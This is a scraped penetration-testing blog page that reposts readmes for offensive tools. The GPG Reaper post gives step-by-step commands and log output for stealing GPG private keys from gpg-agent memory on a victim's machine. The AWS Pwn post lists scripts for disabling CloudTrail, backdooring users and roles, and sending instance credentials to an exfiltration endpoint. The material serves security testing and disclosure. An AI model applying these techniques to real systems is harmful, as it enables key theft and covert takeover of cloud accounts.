JCS – Joomla Vulnerability Component Scanner

JCS (Joomla Component Scanner) made for penetration testing purpose on Joomla CMS JCS can help you with the latest component vulnerabilities and exploits. The database can update from several resources and a Crawler has been implemented to find components and component’s link.This version supports Exploitdb and Packetstorm vulnerabilities to create a database for joomla components JCS can also create a Report in HTML for you.Features:Multi-ThreadDelay between requestsCustom Http HeadersSupports Http-ProxySupports Http Authentication:BASICDIGESTComponent crawler base by Regex-PatternComponent’s Page Identification By:Page ComparisonRegex PatternSearching in HTML tags example: not found</title>Checking Http Status CodeReport Sample:Download JCS</p> <p><img class="feed-img" src="https://1.bp.blogspot.com/-maxw78If0VE/WtrLhHlgDZI/AAAAAAAAK7g/XB9Qx8UastIDwn_yWskp16BDvjaVeuErwCLcBGAs/s640/JCS_2_report.jpeg" /></p> <p>Link: <a href="http://feedproxy.google.com/~r/PentestTools/~3/0KulPCiRXCU/jcs-joomla-vulnerability-component.html">http://feedproxy.google.com/~r/PentestTools/~3/0KulPCiRXCU/jcs-joomla-vulnerability-component.html</a></p> </div><!-- .entry-content --> </div> </article><!-- #post-## --> <article id="post-97058" class="post-97058 post type-post status-publish format-standard hentry category-uncategorized tag-crawler tag-dirbuster tag-pencrawler tag-penetration-testing tag-web tag-web-crawler tag-windows"> <div class="top-category"><i class="fa fa-tag"></i> <span class="cat-links"><a href="https://hackertor.com/category/uncategorized/" rel="category tag">HackerTor</a></span></div> <div class="post-inner"> <header class="entry-header"> <h1 class="entry-title"><a href="https://hackertor.com/2018/04/19/pencrawler-an-advanced-web-crawler-and-dirbuster/" rel="bookmark">PenCrawLer – An Advanced Web Crawler And DirBuster</a></h1> </header><!-- .entry-header --> <div class="entry-content"> <p>An Advanced Web Crawler and DirBuster PeNCrawLer is an advanced webcrawler and dirbuster designed to using in penetration testing based on Windows Os.Web Crawler Features:Follow RedirectsRendering JavascriptExtract links from custom HTML-ElementsExtract links with Regex-PatternBlack-List extentionsWhite-List extentionsDownlaod files from white-list extentionsSetting-Up limit for crawling similar linksSearching for string in:UrlResponseAutomatic Form SubmissionSupport Http-ProxySupported Authentication:BasicDigestThrottling modeDirBuster Features:Dictionary attackBruteforce attackCustom bruteforce charsetCustom request method:GET ONLYAuto-Switch( GET and HEAD )Recursive modeBruteforce directoriesBruteforce files with custom extentionsAutomatic page detection by:Failure status-codeSuccess status-codeRegex patternHTML sourceDownload PenCrawLer</p> <p><img class="feed-img" src="" /></p> <p>Link: <a href="http://feedproxy.google.com/~r/PentestTools/~3/nGnZsRteXCs/pencrawler-advanced-web-crawler-and.html">http://feedproxy.google.com/~r/PentestTools/~3/nGnZsRteXCs/pencrawler-advanced-web-crawler-and.html</a></p> </div><!-- .entry-content --> </div> </article><!-- #post-## --> <article id="post-96047" class="post-96047 post type-post status-publish format-standard hentry category-uncategorized tag-exploitation tag-gpg-reaper tag-linux tag-penetration-testing tag-powershell tag-python tag-sha256 tag-sha512 tag-testing tag-windows"> <div class="top-category"><i class="fa fa-tag"></i> <span class="cat-links"><a href="https://hackertor.com/category/uncategorized/" rel="category tag">HackerTor</a></span></div> <div class="post-inner"> <header class="entry-header"> <h1 class="entry-title"><a href="https://hackertor.com/2018/04/17/gpg-reaper-obtain-steal-restore-gpg-private-keys-from-gpg-agent-cache-memory/" rel="bookmark">GPG Reaper – Obtain/Steal/Restore GPG Private Keys From Gpg-Agent Cache/Memory</a></h1> </header><!-- .entry-header --> <div class="entry-content"> <p>Obtain/Steal/Restore GPG Private Keys from gpg-agent cache/memoryThis POC demonstrates method for obtaining GPG private keys from gpg-agent memory under Windows.Normally this should be possible only within 10 minutes time frame (–default-cache-ttl value).Unfortunately housekeeping() function (which is responsible for cache cleanup) is executed only if you are using GPG (there is no timer there).This means that in normal GPG usecase like: you sign some file then close GUI and do other task you password is still in gpg-agent memory (even if ttl expired).Attacker, who has access to your current session, can use this for stealing private key without knowing your passphrase.Installationpip install PGPyIf you got:TypeError: Error when calling the metaclass bases metaclass conflict: the metaclass of a derived class must be a (non-strict) subclass of the metaclasses of all its bases` when running python script then:then:pip install six==1.10.0Test1. Install Gpg4Win 3.0.32. Open command line and start agent with 2 seconds cache time:cd c:\Program Files (x86)\GnuPG\bintaskkill /im gpg-agent.exe /Fgpg-agent.exe –daemon –default-cache-ttl 23. Run Kleopatra and generate new key pair4. Sign some example test file5. Pinetry will popup and ask you for passphrase6. Repeat step 4-5. Each time pinetry shows up because our 2 seconds cache expired7. Run GPG reaperpowershell -ExecutionPolicy Bypass -File Gpg-Reaper.ps1 -OutputFile testme.txtYou will see something like:[+] Detect GPG version 3.0.3[*] Readed jmp bytes: F6-05-E0-F9-45-00-04-0F-85[*] Readed housekeeping bytes: 55[+] Find sec key[+] Check key grip:[*] uid [ultimate] Adam Nowak <anowak@example.com>[+] Found public key[*] Allocate memory at: 2d00000[+] Read debug log C:\Users\user\AppData\Local\Temp\gpg_D98F5932C4193BF82B9C773F13899DD586A1DE38_KqALSXPH.txt[+] Key dumped[*] Kill background Job[*] Restore bytesAs you can see we dump key. This is possible because we nopped the housekeeping function.8. Restore private key:python gpg_reaper.py .\testme.txtPrivate key is dumped to the file:[+] Dump E057D86EE78A0EED070296C01BC8630ED9C841D0 – Adam Nowak <anowak@example.com>IntroductionGPG-Agent is a daemon to manage private keys independently from any protocol.GUI interface communicates with agent using Assuan Protocol.By default agent caches your credentials.–default-cache-ttl n option set the time a cache entry is valid to n seconds.The default is 600 seconds. Each time a cache entry is accessed, its timer is reseted.Under Windows sign process looks like this:Crucial part here is housekeeping() function which is responsible for removing expired credentials from the memory.But there is one problem here: this function is executed only in two places (inside agent_put_cache and agent_get_cache).This means that cached credentials are NOT removed from the memory until some gpg-agent commands which uses agent_put_cache or agent_get_cache or agent_flush_cache are executed.UsageOn victim computer:powershell -ExecutionPolicy Bypass -File Gpg-Reaper.ps1 -OutputFile out.txtTransfer out.txt to your machine and restore private keys:gpg_reaper.py out.txtPrivate keys will be dumped into separate files.If GPG is installed outside default directories:Gpg-Reaper -GpgConnectAgentPath c:\gpg\gpg-connect-agent.exe -GpgAgentPath c:\gpg\gpg-agent.exe -GpgPath c:\gpg\gpg.exeIf you don’t want debug messages:Gpg-Reaper -Verbose $falsePost exploitation on machine with GPGLet’s assume that you are doing penetration testing and you obtain shell on computer with GPG installed.If you are lucky and user use GPG recently and cache not expire you can:1. Sign some file:Run c:\Program Files (x86)\GnuPG\bin\gpg-connect-agent.exeGet list of keys available on specific machineKEYINFO –listS KEYINFO 38EA3CACAF3A914C5EC2D05F86CDBDCFE83077D2 D – – – P – – -Set keygrip and message hashSIGKEY 38EA3CACAF3A914C5EC2D05F86CDBDCFE83077D2# SHA512 of the messageSETHASH 10 7bfa95a688924c47c7d22381f20cc926f524beacb13f84e203d4bd8cb6ba2fce81c57a5f059bf3d509926487bde925b3bcee0635e4f7baeba054e5dba696b2bfPKSIGN2. Export private key:Run c:\Program Files (x86)\GnuPG\bin\gpg-connect-agent.exeGet wrapping keyKEYWRAP_KEY –exportExport a secret key from the key store. The key will be encrypted using the current session’s key wrapping key using the AESWRAP-128 algorithmEXPORT_KEY 38EA3CACAF3A914C5EC2D05F86CDBDCFE83077D2Unfortunately this is not working as expected and ask for password.Why? Because cmd_export_key() function is executing agent_key_from_file() with CACHE_MODE_IGNORE flag which means that cache won’t be used and user is asked for passphrase each time.Bypass private key export restrictionWe know that it’s not possible to export GPG key through gpg-agent without knowing password.But there is little quirk here. Agent has few options available:1. –debug-levelSelect the debug level for investigating problems. level may be a numeric value or a keyword:guru – All of the debug messages you can get.2. –log-file fileAppend all logging output to file. This is very helpful in seeing what the agent actually does.Let’s run agent using gpg-agent.exe –daemon –debug-level guru –log-file out.txt and sign some file.2018-03-04 18:21:15 gpg-agent[7180] DBG: chan_0x0000008c <- SIGKEY 590A068768B6A5CB4DD81CD4828C72AD8427DFE42018-03-04 18:21:15 gpg-agent[7180] DBG: chan_0x0000008c -> OK2018-03-04 18:21:15 gpg-agent[7180] DBG: chan_0x0000008c <- SETKEYDESC Please+enter+the+passphrase+to+unlock+the+OpenPGP+secret+key:%0A%22adam+nowak+<nowak@adam.xxx>%22%0A2048-bit+RSA+key,+ID+1308197BFDF95EAA,%0Acreated+2018-02-28.%0A2018-03-04 18:21:15 gpg-agent[7180] DBG: chan_0x0000008c -> OK2018-03-04 18:21:15 gpg-agent[7180] DBG: chan_0x0000008c <- SETHASH 8 B00357D0B85243BB34049E13FD5C328228BC53B317DF970594A1CED6CB89F4EA2018-03-04 18:21:15 gpg-agent[7180] DBG: chan_0x0000008c -> OK2018-03-04 18:21:15 gpg-agent[7180] DBG: chan_0x0000008c <- PKSIGN2018-03-04 18:21:15 gpg-agent[7180] DBG: agent_get_cache ‘590A068768B6A5CB4DD81CD4828C72AD8427DFE4’ (mode 2) …2018-03-04 18:21:15 gpg-agent[7180] DBG: … miss2018-03-04 18:21:15 gpg-agent[7180] starting a new PIN Entry2018-03-04 18:21:15 gpg-agent[7180] DBG: connection to PIN entry established2018-03-04 18:21:15 gpg-agent[7180] DBG: chan_0x0000008c -> INQUIRE PINENTRY_LAUNCHED 3736 qt 1.1.0 /dev/tty – -2018-03-04 18:21:15 gpg-agent[7180] DBG: chan_0x0000008c <- END2018-03-04 18:21:18 gpg-agent[7180] DBG: agent_put_cache ‘590A068768B6A5CB4DD81CD4828C72AD8427DFE4’ (mode 2) requested ttl=02018-03-04 18:21:18 gpg-agent[7180] DBG: skey: (private-key2018-03-04 18:21:18 gpg-agent[7180] DBG: (rsa2018-03-04 18:21:18 gpg-agent[7180] DBG: (n #00EBF36EC96D941D126938C8BD7471F4BA4FF456A3034AD4EEBABABA3A6DE52445A2A67A4FB3DF8B90C6FD65D4B648D62749905DA1CEA7ECB8C31F7DC7ECF3B581668BA3041E6AD57DBE04D75E4C74612B310704B107AB49EE731FB991A7EE0B42E9BD4CD2FF09A2C5EC0AB13B4F53287706432BD03EFD5EA5AAC194CEF188018AAD3E394F14C587BB9A829E21EC39132652CED22B561EDB34E0E4FA64FD2E6035E035EA2592C2C89E71AD2B7A3B4BBFC14288D5448D6F7A64B37AB5AA80E5D34D03F9FC6375882D298DDBCB95F192C669DB141AA2B5F29F2DFC3B12DCB7385492C3EAD8F675901B78C69238A60E76163ED1130D9B4054A9A90AB8DA148280351F#)2018-03-04 18:21:18 gpg-agent[7180] DBG: (e #010001#)2018-03-04 18:21:18 gpg-agent[7180] DBG: (d #4B873C9EF0DB392524167FB7999742CA02FF095E9C16AFAB8D8D69407BDE1E2AC64279239B46032480762BCB17E09FE0AA9D3243B1E5B21280AF4B719C6974DFEBA5E63452D24AEDB9CE4DEC8B17B3E502082799CD8528A0D22C45181983CB0A0BCD4352C53DDDE3724807EC9EDB5538288286FB5DB6783E1AB765BD8AB6491B7021D17AEDD7494F902121C4B2C3BDB1447C0AABADD00FBD66EEC23882F9FC13DC967E6F1F5ABBAD9FA7E583360A31D3DAEC53CB46F981398CAAD511179E11B5BA04BDB79699AA58687287E9ABA9A820B22872C54078411A142AEA804497581AAD96FCBE4F01202AA4E687672973D26E7148AB7A269B60C68581817B1EB31DE5#)2018-03-04 18:21:18 gpg-agent[7180] DBG: (p #00ED6EA59EE03412314BF288629568237A649FACC88C5D6E2F266A58D1CF6BA26254526F916FF7CFC6AF5B5ED0618CE00099DCFB9CB1F7C6BAD6945A8125ECD6A352E8056644A7336FFE2C203B098ED7767FD51101FD4842F1DED870DFD4D1F947D5FB7AB13E318C977AB875F86785F8B98260BB3BA1F6133D03C9296F22875E23#)2018-03-04 18:21:18 gpg-agent[7180] DBG: (q #00FE67215C9C6FEF8C21C81A9B34AAB91FCD321D95E3641D7EFE4B89BBAD918CF94068AC89440147ED07E68EC65997568921DE740A504D2D99DDB997BE7DE09228678F544226F2D75F62447AECD7385773D9A7B0EF272B5CF4F32B4EFCB1B0B81893DE768B692D350CFB6B32A683DF773D66169A436DC233AD412FD438E366B6D5#)2018-03-04 18:21:18 gpg-agent[7180] DBG: (u #17BA591E668D2D78B1C74E5820A9FE31481232D34B6EBBC2004767512AD4835A42B0621EBE6CD4359BFD9B8DDA3DF234471C99B1CF553EBCF5019452143360FEC051024E43063913DD7A36FA1CA12C02FEAF07C4A4DA50C5286264BC38333C85371B13C704B1FA0265FA4DF17CC1E02B9E37ACA7D72AE40413CA6E5548107299#)))2018-03-04 18:21:18 gpg-agent[7180] DBG: hash: (data2018-03-04 18:21:18 gpg-agent[7180] DBG: (flags pkcs1)2018-03-04 18:21:18 gpg-agent[7180] DBG: (hash sha256 #B00357D0B85243BB34049E13FD5C328228BC53B317DF970594A1CED6CB89F4EA#))It looks like guru mode prints n, e, d, p, q and u numbers to log file. Knowing this we can calculate public and private key.Internally skey value is print by gcry_log_debugsxp() when DBG_CRYPTO is set:if (DBG_CRYPTO){ gcry_log_debugsxp (“skey", s_skey); gcry_log_debugsxp ("hash", s_hash);}FAQWhy PowerShell?Because this file can be run without any external dependencies on most modern Windows systems.GPG %file% not existgpg-connect-agent.exe, gpg-agent.exe or gpg.exe does not exist in default location.You can try to specify custom location using:Gpg-Reaper -GpgConnectAgentPath c:\gpg\gpg-connect-agent.exe -GpgAgentPath c:\gpg\gpg-agent.exe -GpgPath c:\gpg\gpg.exeNo gpg-agent runninggpg-agent.exe is not running on this system so we cannot restore private key.Unknown gpg-agent version, sha256:Currently this script support only specific versionsNo cached keyThere is no cached key in memory so we cannot restore private key.AttributionScythe icon made by Freepik from www.flaticon.com.Solstice Of Suffering font by GraveTech.Download GPG Reaper</p> <p><img class="feed-img" src="https://1.bp.blogspot.com/-U97V5W1JM_4/Ws2Zmu0dUMI/AAAAAAAAK3s/4Sjz56v-FHAXk8bt69Kh70fCP6SiWJqtACLcBGAs/s640/gpg_reaper_2_reaper.png" /></p> <p>Link: <a href="http://feedproxy.google.com/~r/PentestTools/~3/FvmK-bXM-qg/gpg-reaper-obtainstealrestore-gpg.html">http://feedproxy.google.com/~r/PentestTools/~3/FvmK-bXM-qg/gpg-reaper-obtainstealrestore-gpg.html</a></p> </div><!-- .entry-content --> </div> </article><!-- #post-## --> <article id="post-95578" class="post-95578 post type-post status-publish format-standard hentry category-uncategorized tag-aws tag-aws-pwn tag-collection tag-ec2 tag-hidden tag-linux tag-mac tag-passwords tag-penetration-testing tag-testing"> <div class="top-category"><i class="fa fa-tag"></i> <span class="cat-links"><a href="https://hackertor.com/category/uncategorized/" rel="category tag">HackerTor</a></span></div> <div class="post-inner"> <header class="entry-header"> <h1 class="entry-title"><a href="https://hackertor.com/2018/04/15/aws-pwn-a-collection-of-aws-penetration-testing-junk/" rel="bookmark">AWS Pwn – A Collection Of AWS Penetration Testing Junk</a></h1> </header><!-- .entry-header --> <div class="entry-content"> <p>This is a collection of horribly written scripts for performing various tasks related to penetration testing AWS. Please don’t be sad if it doesn’t work for you. It might be that AWS has changed since a given tool was written or it might be that the code sux. Either way, please feel free to contribute.Most of this junk was written by Daniel Grzelak but there’s been plenty of contributions, most notably Mike Fuller.Requirementspip install -r requirements.txtMake sure to also set up your aws credentials in ~/.aws/credentials.ReconnaissanceThings to do with pre-compromise information gathering.validate_iam_access_keys.py – Given a TSV file of access key + secret [+ session] combinations, checks access validity and returns identity information of the principal../validate_iam_access_keys.py -i /tmp/keys.txt -o /tmp/out.jsonvalidate_s3_buckets.py – Given a text file with one word per line, checks whether the buckets exist and returns basic identifying information../validate_s3_buckets.py -i /tmp/words.txt -o /tmp/out.jsonvalidate_iam_principals.py – Given a text file of principals (e.g. user/admin, role/deploy), checks whether the principals exist in a given account../validate_iam_principals.py -a 123456789012 -i /tmp/words.txt -o /tmp/out.jsonvalidate_accounts.py – Given a text file of account ids and account aliases, checks whether the accounts exist../validate_accounts.py -i /tmp/accounts.txt -o /tmp/out.jsonExploitationThings that will help you gain a foothold in an account.StealthThings that might help you stay hidden after compromising an account.disrupt_cloudtrail.py – Attempts to disrupt/cripple cloudtrail logging in the specified way../disrupt_cloudtrail.py -sExplorationThings to help you understand what you’ve pwned.dump_account_data.sh – Calls a bunch of generic account-based read/list/get/describe functions and saves the data to a given location. Very noisy but great for a point in time snapshot../dump_account_data.sh /tmp/ElevationThings to help you move around an account and gather different levels of access.dump_instance_attributes.py – Goes through every EC2 instance in the account and retrieves the specified instance attributes. Most commonly used to retrieve userData, which tends to contain secrets../dump_instance_attributes.py -u -o /tmp/dump_cloudformation_stack_descriptions.py – Retrieves the stack descriptions for every existing stack and every stack deleted in the last 90 days. Parameters in stack descriptions often contain passwords and other secrets../dump_cloudformation_stack_descriptions.py -o /tmp/dataassume_roles.py – Attempts to assume all roles (ARNs) in a file or provided by the list-roles API../assume_roles.py -o /tmp/out.jsonadd_iam_policy – Adds the administrator and all action policy to a given user, role, or group. Requires IAM putPolicy or attachPolicy privileges../add_iam_policy.py -u myuser -r myrole -g mygroupbouncy_bouncy_cloudy_cloud – Bounces a given ec2 instance and rewrites its userData so that you can run arbirtary code or steal temporary instance profile credentials../bouncy_bouncy_cloudy_cloud.py -i instance-id -e exfiltration-endpointPersistenceThings to help maintain your access to an acccount.rabbit_lambda – An example Lambda function that responds to user delete events by creating more copies of the deleted user.cli_lambda – A lambda function that acts as an aws cli proxy and doesnt require credentials.backdoor_created_users_lambda – A lambda function that adds an access key to each newly created user.backdoor_created_roles_lambda – A lambda function that adds a trust relationship to each newly created role.backdoor_created_security_groups_lambda – A lambda function that adds a given inbound access rule to each newly created security group.backdoor_all_users.py – Adds an access key to every user in the account.backdoor_all_roles.py – Adds a trust relationship to each role in the account. Requires editing the file to set the role ARN.backdoor_all_security_groups.py – Adds a given inbound access rule to each security group in the account. Requires editing the file to set the rule.ExfiltrationThings to help you extract and move data around in AWSy ways.dynamodump – https://github.com/bchew/dynamodumpMiscellaneaOther things that I was either to stupid or too lazy to classify.reserved_words.txt – A list of words/tokens that have some special meaning in AWS or are likely to soon have some special meaning.endpoints.txt – A somewhat up to date list of API endpoints exposed by AWS.integrations.txt – A TSV of services that integrate with AWS via roles or access keys and their account ids, default usernames etc.download_docs.sh – The command line to wget all the AWS docs because I’m stupid and waste time redoing it every time.To doAdd passwords to users for persistenceDump stack resourcesValidate mfaAdd more calls to dump_account_dataAdd more log disruption methodsCreate a cloudtrail parsing script for grabbing goodies out of cloudtrailCreate an s3 bucket permission enumeratorCreate tool to grab aws credentials from common places on diskCreate cloning toolCreate silly privelege escalation tool that uses passroleValidate queuesValidate notification topicsFix up persistence scripts to use arguments instead of constants inside the scriptsDownload Aws_Pwn</p> <p><img class="feed-img" src="https://2.bp.blogspot.com/-CH8tUygGO-0/Ws2Pwm4tzrI/AAAAAAAAK24/sRQUoiAzaxsTuovfdT91nL41ycnp4nvTwCLcBGAs/s640/aws_pwn.png" /></p> <p>Link: <a href="http://feedproxy.google.com/~r/PentestTools/~3/nv4qusjKqTQ/aws-pwn-collection-of-aws-penetration.html">http://feedproxy.google.com/~r/PentestTools/~3/nv4qusjKqTQ/aws-pwn-collection-of-aws-penetration.html</a></p> </div><!-- .entry-content --> </div> </article><!-- #post-## --> <article id="post-95570" class="post-95570 post type-post status-publish format-standard hentry category-uncategorized tag-adversary-emulation tag-apt-simulator tag-atomic-red-team tag-autottp tag-blue-team-training-toolkit tag-caldera tag-cobalt-strike tag-crackmapexec tag-datasploit tag-dumpsterfire tag-empire tag-harpoon tag-immunity-adversary-simulation tag-infection-monkey tag-invoke-adversary tag-invoke-attackapi tag-maltego tag-metta tag-mitre-attck tag-nmap tag-open-source tag-penetration-testing tag-powershell tag-python tag-recon-ng tag-red-team-automation tag-redhunt tag-responder tag-theharvestor tag-tools tag-vulnerability-assessment tag-web-application-security tag-yeti"> <div class="top-category"><i class="fa fa-tag"></i> <span class="cat-links"><a href="https://hackertor.com/category/uncategorized/" rel="category tag">HackerTor</a></span></div> <div class="post-inner"> <header class="entry-header"> <h1 class="entry-title"><a href="https://hackertor.com/2018/04/15/list-of-adversary-emulation-tools/" rel="bookmark">List of Adversary Emulation Tools</a></h1> </header><!-- .entry-header --> <div class="entry-content"> <p>PenTestIT RSS Feed<br /> Every once in a while, the security industry brings forth a new buzz word and introduces terminologies that sound über cool and generate lot’s of interest. One such word going around now-a-days is automated “adversary emulation“. Let’s first understand what this really means. Adversary emulation/simulation offers a method to test a network’s resilience against anRead more about List of Adversary Emulation Tools<br /> The post List of Adversary Emulation Tools appeared first on PenTestIT.</p> <p><img class="feed-img" src="" /></p> <p>Link: <a href="http://pentestit.com/adversary-emulation-tools-list/">http://pentestit.com/adversary-emulation-tools-list/</a></p> </div><!-- .entry-content --> </div> </article><!-- #post-## --> <article id="post-95526" class="post-95526 post type-post status-publish format-standard hentry category-uncategorized tag-archive-org tag-penetration-testing tag-pentesting tag-php tag-recon tag-reconcat tag-reconnaissance tag-testing tag-wayback-archiver tag-wayback-machine"> <div class="top-category"><i class="fa fa-tag"></i> <span class="cat-links"><a href="https://hackertor.com/category/uncategorized/" rel="category tag">HackerTor</a></span></div> <div class="post-inner"> <header class="entry-header"> <h1 class="entry-title"><a href="https://hackertor.com/2018/04/13/reconcat-tool-to-fetch-archive-url-snapshots-from-archive-org/" rel="bookmark">ReconCat – Tool To Fetch Archive Url Snapshots From Archive.org</a></h1> </header><!-- .entry-header --> <div class="entry-content"> <p>A small Php application to fetch archive url snapshots from archive.org.using it you can fetch complete list of snapshot urls of any year or complete list of all years possible.Made Specially for penetration testing purpose.This application is powered by WMB-ScrapperInstallationClone this repository, git clone https://github.com/daudmalik06/ReconCat cd ReconCat php reconRequirementsThis application requires php 7+multi threading is available as optional, if you have php pthreads installed you can use that to speed up the process.Informationit saves all snapshots in Output directory, e,g for google.com it will make a directory as Output/google.com and will save all related snapshot in that directoryall snapshot will be saved on year bases, i.e snapshot of every year will be saved in different file e.g 2009_google.com .threads are used for fetching several(year based) snapshot concurrentlysingle year snapshot is fetched in a single threadUsageFor helpphp recon –helpOther commandsphp recon –url=https://github.com -t10 (fetch all snapshot of github with 10 threads)php recon -y2012 –url=https://github.com -t10 (fetch snapshot of year 2012 of github with 10 threads)AuthorDawood Ikhlaq and Open source communityDownload ReconCat</p> <p><img class="feed-img" src="https://4.bp.blogspot.com/-XE8k0mo80ZM/Ws1G73M1xAI/AAAAAAAAK2I/qQfaFZG_A5Mgwbj0CXZD-1WpxwyfcmE_gCLcBGAs/s640/ReconCat_2_reconCatHelp2.jpeg" /></p> <p>Link: <a href="http://feedproxy.google.com/~r/PentestTools/~3/mk_b1XyLTlM/reconcat-tool-to-fetch-archive-url.html">http://feedproxy.google.com/~r/PentestTools/~3/mk_b1XyLTlM/reconcat-tool-to-fetch-archive-url.html</a></p> </div><!-- .entry-content --> </div> </article><!-- #post-## --> <article id="post-95400" class="post-95400 post type-post status-publish format-standard hentry category-uncategorized tag-penetration-testing"> <div class="top-category"><i class="fa fa-tag"></i> <span class="cat-links"><a href="https://hackertor.com/category/uncategorized/" rel="category tag">HackerTor</a></span></div> <div class="post-inner"> <header class="entry-header"> <h1 class="entry-title"><a href="https://hackertor.com/2018/04/12/comprehensive-guide-to-port-redirection-using-rinetd/" rel="bookmark">Comprehensive Guide to Port Redirection using Rinetd</a></h1> </header><!-- .entry-header --> <div class="entry-content"> <p>Hello friends today we will discuss what is Port redirecting/ forwarding and necessary Steps for this technique for accessing network traffic through firewall restricted port. First check out following things: What is Port redirecting? In computer networking, port forwarding/redirecting or port mapping is an application of network address translation (NAT) that redirects a communication request from one address and port number combination to another while the packets are… Continue reading →<br /> The post Comprehensive Guide to Port Redirection using Rinetd appeared first on Hacking Articles.</p> <p><img class="feed-img" src="https://i0.wp.com/2.bp.blogspot.com/-WCmZx7lc59s/Ws90FV75zfI/AAAAAAAAWPc/d2nd9_BIXtY6UZjteUSJEJOo9XL9T2uPgCLcBGAs/s1600/21.PNG" /></p> <p>Link: <a href="http://www.hackingarticles.in/comprehensive-guide-to-port-redirection-using-rinetd/">http://www.hackingarticles.in/comprehensive-guide-to-port-redirection-using-rinetd/</a></p> </div><!-- .entry-content --> </div> </article><!-- #post-## --> <article id="post-94406" class="post-94406 post type-post status-publish format-standard hentry category-uncategorized tag-amazon tag-aws tag-discovery tag-gogetbucket tag-linux tag-mac tag-penetration-testing tag-penetration-testing-tool tag-recon tag-s3 tag-testing tag-testing-tool tag-windows tag-wordlist"> <div class="top-category"><i class="fa fa-tag"></i> <span class="cat-links"><a href="https://hackertor.com/category/uncategorized/" rel="category tag">HackerTor</a></span></div> <div class="post-inner"> <header class="entry-header"> <h1 class="entry-title"><a href="https://hackertor.com/2018/04/08/gogetbucket-a-penetration-testing-tool-to-enumerate-and-analyse-amazon-s3-buckets-owned-by-a-domain/" rel="bookmark">goGetBucket – A Penetration Testing Tool To Enumerate And Analyse Amazon S3 Buckets Owned By A Domain</a></h1> </header><!-- .entry-header --> <div class="entry-content"> <p>When performing a recon on a domain – understanding assets they own is very important. AWS S3 bucket permissions have been confused time and time again, and have allowed for the exposure of sensitive material.What this tool does, is enumerate S3 bucket names using common patterns I have identified during my time bug hunting and pentesting. Permutations are supported on a root domain name using a custom wordlist. I highly recommend the one packaged within AltDNS.The following information about every bucket found to exist will be returned:List PermissionWrite PermissionRegion the Bucket exists inIf the bucket has all access disabledInstallationgo get -u github.com/glen-mac/goGetBucketUsagegoGetBucket -m ~/tools/altdns/words.txt -d <domain> -o <output> -i <wordlist>Usage of ./goGetBucket: -d string Supplied domain name (used with mutation flag) -f string Path to a testfile (default “/tmp/test.file") -i string Path to input wordlist to enumerate -k string Keyword list (used with mutation flag) -m string Path to mutation wordlist (requires domain flag) -o string Path to output file to store log -t int Number of concurrent threads (default 100)Throughout my use of the tool, I have produced the best results when I feed in a list (-i) of subdomains for a root domain I am interested in. E.G:www.domain.commail.domain.comdev.domain.comThe test file (-f) is a file that the script will attempt to store in the bucket to test write permissions. So maybe store your contact information and a warning message if this is performed during a bounty?The keyword list (-k) is concatenated with the root domain name (-d) and the domain without the TLD to permutate using the supplied permuation wordlist (-m).Be sure not to increase the threads too high (-t) – as the AWS has API rate limiting that will kick in and start giving an undesired return code.Download goGetBucket</p> <p><img class="feed-img" src="https://4.bp.blogspot.com/-j3DgZwPbhAE/WsRKVQGSoKI/AAAAAAAAKyw/qHxG8CwRu3g6hZlwBINfnk1M-s1u1gtxQCLcBGAs/s1600/goGetBucket_1.png" /></p> <p>Link: <a href="http://feedproxy.google.com/~r/PentestTools/~3/adU2FnDZEgo/gogetbucket-penetration-testing-tool-to.html">http://feedproxy.google.com/~r/PentestTools/~3/adU2FnDZEgo/gogetbucket-penetration-testing-tool-to.html</a></p> </div><!-- .entry-content --> </div> </article><!-- #post-## --> <article id="post-94392" class="post-94392 post type-post status-publish format-standard hentry category-uncategorized tag-autosploit tag-censys tag-metasploit tag-open-source tag-penetration-testing tag-shodan tag-tools tag-vulnerability-assessment tag-zoomeye"> <div class="top-category"><i class="fa fa-tag"></i> <span class="cat-links"><a href="https://hackertor.com/category/uncategorized/" rel="category tag">HackerTor</a></span></div> <div class="post-inner"> <header class="entry-header"> <h1 class="entry-title"><a href="https://hackertor.com/2018/04/08/autosploit-shodan-censys-zoomeye-metasploit/" rel="bookmark">AutoSploit = Shodan/Censys/Zoomeye + Metasploit</a></h1> </header><!-- .entry-header --> <div class="entry-content"> <p>PenTestIT RSS Feed<br /> I know, I know that you already have read about AutoSploit and used it probably since word got out about this auto exploitation tool some two months ago. However, between then and now, a lot has changed with the tool and this post is about that. What is AutoSploit? AutoSploit is an automated, mass exploitationRead more about AutoSploit = Shodan/Censys/Zoomeye + Metasploit<br /> The post AutoSploit = Shodan/Censys/Zoomeye + Metasploit appeared first on PenTestIT.</p> <p><img class="feed-img" src="" /></p> <p>Link: <a href="http://pentestit.com/autosploit-shodan-censys-zoomeye-metasploit/">http://pentestit.com/autosploit-shodan-censys-zoomeye-metasploit/</a></p> </div><!-- .entry-content --> </div> </article><!-- #post-## --> <article id="post-94182" class="post-94182 post type-post status-publish format-standard hentry category-uncategorized tag-apache-jmeter tag-cve-2018-1297 tag-nmap tag-penetration-testing tag-proof-of-concept tag-vulnerability-assessment tag-web-application-security tag-ysoserial"> <div class="top-category"><i class="fa fa-tag"></i> <span class="cat-links"><a href="https://hackertor.com/category/uncategorized/" rel="category tag">HackerTor</a></span></div> <div class="post-inner"> <header class="entry-header"> <h1 class="entry-title"><a href="https://hackertor.com/2018/04/06/apache-jmeter-rmi-code-execution-poc-cve-2018-1297/" rel="bookmark">Apache JMeter RMI Code Execution PoC (CVE-2018-1297)</a></h1> </header><!-- .entry-header --> <div class="entry-content"> <p>PenTestIT RSS Feed<br /> Recently, I read about a remote code execution (RCE) vulnerability; CVE-2018-1297, that affects yet another Apache product – JMeter. As you might know, “The Apache JMeter™ application is open source software, a 100% pure Java application designed to load test functional behavior and measure performance.” The CVE Mitre page does not mention a lot of details, mentioning just thatRead more about Apache JMeter RMI Code Execution PoC (CVE-2018-1297)<br /> The post Apache JMeter RMI Code Execution PoC (CVE-2018-1297) appeared first on PenTestIT.</p> <p><img class="feed-img" src="" /></p> <p>Link: <a href="http://feedproxy.google.com/~r/PenTestIT/~3/nMdxT68oA90/">http://feedproxy.google.com/~r/PenTestIT/~3/nMdxT68oA90/</a></p> </div><!-- .entry-content --> </div> </article><!-- #post-## --> <div class="navigation posts-navigation"><ul> <li class="active"><a href="https://hackertor.com/tag/penetration-testing/">1</a></li> <li><a href="https://hackertor.com/tag/penetration-testing/page/2/">2</a></li> <li><a href="https://hackertor.com/tag/penetration-testing/page/3/">3</a></li> <li>…</li> <li><a href="https://hackertor.com/tag/penetration-testing/page/32/">32</a></li> <li><a href="https://hackertor.com/tag/penetration-testing/page/2/" >></a></li> </ul></div> </main><!-- #main --> </div><!-- #primary --> <div id="secondary" class="widget-area" 